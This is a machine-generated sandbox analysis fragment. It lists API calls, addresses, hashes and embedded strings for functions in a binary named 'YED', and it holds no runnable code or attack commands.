                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                • Opcode ID: 2e16f6f99e8a274efbb7df40fd70d704919c3e8be06fb3ca03cf3efc89cc9925
                                                                                                                                                • Instruction ID: 6fa91216b085378eb6f77a41b2ea8298adaeb3baa77f03c85c94998fdc43fdac
                                                                                                                                                • Opcode Fuzzy Hash: 2e16f6f99e8a274efbb7df40fd70d704919c3e8be06fb3ca03cf3efc89cc9925
                                                                                                                                                • Instruction Fuzzy Hash: D101B1317A0210BBFB10A768AC8EF593E59DB8AB12F204011F318AE0D1CDF224559E69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00271449,?,?,00000000), ref: 0027180C
                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00271449,?,?,00000000), ref: 00271813
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00271449,?,?,00000000), ref: 00271828
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00271449,?,?,00000000), ref: 00271830
                                                                                                                                                • DuplicateHandle.KERNEL32 ref: 00271833
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00271449,?,?,00000000), ref: 00271843
                                                                                                                                                • GetCurrentProcess.KERNEL32(00271449,00000000,?,00271449,?,?,00000000), ref: 0027184B
                                                                                                                                                • DuplicateHandle.KERNEL32 ref: 0027184E
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00271874,00000000,00000000,00000000), ref: 00271868
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                • Opcode ID: 21d01cf78d86c8a15184691902e025fe660c0070a26b06d07f9ea3cc88baf7b2
                                                                                                                                                • Instruction ID: c4bed47fdf01e8593b838b3626b56e3cb459327b3d905a01ef38217c8ad30245
                                                                                                                                                • Opcode Fuzzy Hash: 21d01cf78d86c8a15184691902e025fe660c0070a26b06d07f9ea3cc88baf7b2
                                                                                                                                                • Instruction Fuzzy Hash: 3801BF75340304BFE710ABA5EC4DF573BACEB8AB11F104411FA05DB191DE709810CB20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0027D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0027D501
                                                                                                                                                  • Part of subcall function 0027D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0027D50F
                                                                                                                                                  • Part of subcall function 0027D4DC: CloseHandle.KERNEL32(00000000), ref: 0027D5DC
                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0029A16D
                                                                                                                                                • GetLastError.KERNEL32 ref: 0029A180
                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0029A1B3
                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0029A268
                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0029A273
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0029A2C4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                                • Opcode ID: 2add40e3a49415a0e06025f2c2867b656af06eeeb6067dbb7989003236051d98
                                                                                                                                                • Instruction ID: b13d53dc7bb79f29d6647d9e0b8023f617c194e97087ab7c8b93999475257a87
                                                                                                                                                • Opcode Fuzzy Hash: 2add40e3a49415a0e06025f2c2867b656af06eeeb6067dbb7989003236051d98
                                                                                                                                                • Instruction Fuzzy Hash: 06616E306143429FDB10DF18C494F55BBE1AF54318F14849CE46A4B7A2CB76EC55CBD2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00232D4B
                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00232D53
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00232DE1
                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00232E0C
                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00232E61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                • String ID: &H#$csm
                                                                                                                                                • API String ID: 1170836740-98951210
                                                                                                                                                • Opcode ID: 7d5947761b4c4a3e2a29ec450276a8016e24f6def44634d0ce293af4d2009186
                                                                                                                                                • Instruction ID: 588a6868b0e7843ded3a1eedbdee14006cf7fccfbb3c672c23b648a0af5e84c3
                                                                                                                                                • Opcode Fuzzy Hash: 7d5947761b4c4a3e2a29ec450276a8016e24f6def44634d0ce293af4d2009186
                                                                                                                                                • Instruction Fuzzy Hash: 1141B5B4A2020DEBCF10DF68C845A9EBBB5BF45315F148156E815AB392D731EA29CFD0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: IconLoad
                                                                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                                                                • API String ID: 2457776203-404129466
                                                                                                                                                • Opcode ID: fed24a9f0546e549119a30079a8171860341028dabb31a2b73e096a9beb63332
                                                                                                                                                • Instruction ID: 4395393eba585eb737826c4316384504fbef8517adadfce66496d8606fc3878d
                                                                                                                                                • Opcode Fuzzy Hash: fed24a9f0546e549119a30079a8171860341028dabb31a2b73e096a9beb63332
                                                                                                                                                • Instruction Fuzzy Hash: 8711EB316B930BFBA7016F64DC82DFAA79CDF16354B30406FFA08A6382D7B06D205665
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3409252457-0
                                                                                                                                                • Opcode ID: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
                                                                                                                                                • Instruction ID: 7b78f134e2511c621b98c664e76f657f42e83ea4d2adae4dddeec0e6fc36d558
                                                                                                                                                • Opcode Fuzzy Hash: 9f0f20281c48753d05d8944911a4b82861b6959897dfc66cfb2c70a3aa9a6715
                                                                                                                                                • Instruction Fuzzy Hash: 56612571941305AFDB20AFA4B9C0B6DBBA7AF05334F0402AFE945972C1EF329800CB56
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$LocalTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 952045576-0
                                                                                                                                                • Opcode ID: 4a63d7f2873d641925c3e9edc4ab72401004e401e3b784dcc996226ba96164e7
                                                                                                                                                • Instruction ID: af112018266f63c60a2535f5c8ff93501216b2e3d2f46ecdd413e34c087d4faa
                                                                                                                                                • Opcode Fuzzy Hash: 4a63d7f2873d641925c3e9edc4ab72401004e401e3b784dcc996226ba96164e7
                                                                                                                                                • Instruction Fuzzy Hash: B9418AA5C2111876CB11FBF4888AACF77ACAF49710F518593F918E3112FB34E265C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002A2D1B
                                                                                                                                                • GetDC.USER32(00000000), ref: 002A2D23
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A2D2E
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 002A2D3A
                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002A2D76
                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002A2D87
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002A2DC2
                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002A2DE1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                • Opcode ID: fef4013b8fcc33ddd3341ec4aeb475c7e85e697776b3addf528a336dbac92f91
                                                                                                                                                • Instruction ID: e9adbc59af46f9306f6a7c3fd12602b9a77583ff2420727f5fe0ff66a60ac3d6
                                                                                                                                                • Opcode Fuzzy Hash: fef4013b8fcc33ddd3341ec4aeb475c7e85e697776b3addf528a336dbac92f91
                                                                                                                                                • Instruction Fuzzy Hash: 0B31CE72211610BFEB158F14DC8AFEB3FADEF4A711F044055FE089A291CA758C50CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                • Opcode ID: 83aa021161bc98a0373fafcd22c20ee6aa5705318be48988d5ec01059f93c0a9
                                                                                                                                                • Instruction ID: fe07817dfa7f024de866226c3e7c45ea80e32ae10e479956bd6d5326be6a9454
                                                                                                                                                • Opcode Fuzzy Hash: 83aa021161bc98a0373fafcd22c20ee6aa5705318be48988d5ec01059f93c0a9
                                                                                                                                                • Instruction Fuzzy Hash: 36212CA1670A2A77D21899118E82FFAB36DAF12394F448021FD0C9A545FBF4EE3085E5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                • API String ID: 0-572801152
                                                                                                                                                • Opcode ID: 8a1b24fe44a760dca036a689dd5e988d7dc204d629d43ddea562fbfcf3af4f7a
                                                                                                                                                • Instruction ID: 40d01edd8230f04f071123f8c5be59648c07a58bcf6fd0d823b20ae9f5898a89
                                                                                                                                                • Opcode Fuzzy Hash: 8a1b24fe44a760dca036a689dd5e988d7dc204d629d43ddea562fbfcf3af4f7a
                                                                                                                                                • Instruction Fuzzy Hash: BAD1C271B1061A9FDF11CFA8C881BAEB7B5FF48344F148069E919AB281E770DD55CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002515CE
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00251651
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002517FB,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002516E4
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002516FB
                                                                                                                                                  • Part of subcall function 00243820: RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00251777
                                                                                                                                                • __freea.LIBCMT ref: 002517A2
                                                                                                                                                • __freea.LIBCMT ref: 002517AE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2829977744-0
                                                                                                                                                • Opcode ID: d693ef0602c2a7642af77713a8c07fc0c5af47293b8b7d8b82d765cefaa8483f
                                                                                                                                                • Instruction ID: 09d6e92d7f552e69288a2c3e0be6dad69ce6127cc3e1a598de3c048f9031156e
                                                                                                                                                • Opcode Fuzzy Hash: d693ef0602c2a7642af77713a8c07fc0c5af47293b8b7d8b82d765cefaa8483f
                                                                                                                                                • Instruction Fuzzy Hash: 7091C671E202169ADF248E78CC81BEEBBB59F49311F580659EC05E7181EB35DC78CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                                                • Opcode ID: bee327573b40a2c0a9c80ba3debba993057066f35241dc0c8c0772218e1179ab
                                                                                                                                                • Instruction ID: eb650aad4da6aee393e1fc847c58cd5ed82536b68269c3e93047107360489afc
                                                                                                                                                • Opcode Fuzzy Hash: bee327573b40a2c0a9c80ba3debba993057066f35241dc0c8c0772218e1179ab
                                                                                                                                                • Instruction Fuzzy Hash: BA91A471A20219ABDF24DFA4DC84FEEBBB8EF46714F108559F505AB280D7709952CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0028125C
                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00281284
                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002812A8
                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002812D8
                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0028135F
                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002813C4
                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00281430
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2550207440-0
                                                                                                                                                • Opcode ID: a25fb44bb105cd6e93e40b85aaf7f627d84e7c2cb140fc541c360def4114cced
                                                                                                                                                • Instruction ID: 254a38089c40eeb42d02e0ff46d436fcfa01a97451f9ef98b7f77beae060f786
                                                                                                                                                • Opcode Fuzzy Hash: a25fb44bb105cd6e93e40b85aaf7f627d84e7c2cb140fc541c360def4114cced
                                                                                                                                                • Instruction Fuzzy Hash: D091D079A21219AFEB00AF94D884BBE77B9FF45315F104029E900E72D1D774A976CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3225163088-0
                                                                                                                                                • Opcode ID: 0acbdb421a7f586876e83f3ae7d720480b9339fb9ee9eff1bec452f84bd2c503
                                                                                                                                                • Instruction ID: 552b5d3bdef2879795870d8551eb28775e0f2fa69f024661f075359fe4840858
                                                                                                                                                • Opcode Fuzzy Hash: 0acbdb421a7f586876e83f3ae7d720480b9339fb9ee9eff1bec452f84bd2c503
                                                                                                                                                • Instruction Fuzzy Hash: 04911671E1021AAFCB10CFE9D884AEEBBB8FF49320F144155E515B7251D678A9A1CF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0027000E: CLSIDFromProgID.OLE32 ref: 0027002B
                                                                                                                                                  • Part of subcall function 0027000E: ProgIDFromCLSID.OLE32(?,00000000), ref: 00270046
                                                                                                                                                  • Part of subcall function 0027000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0026FF41,80070057,?,?), ref: 00270054
                                                                                                                                                  • Part of subcall function 0027000E: CoTaskMemFree.OLE32(00000000), ref: 00270064
                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00294C51
                                                                                                                                                • _wcslen.LIBCMT ref: 00294D59
                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00294DCF
                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00294DDA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
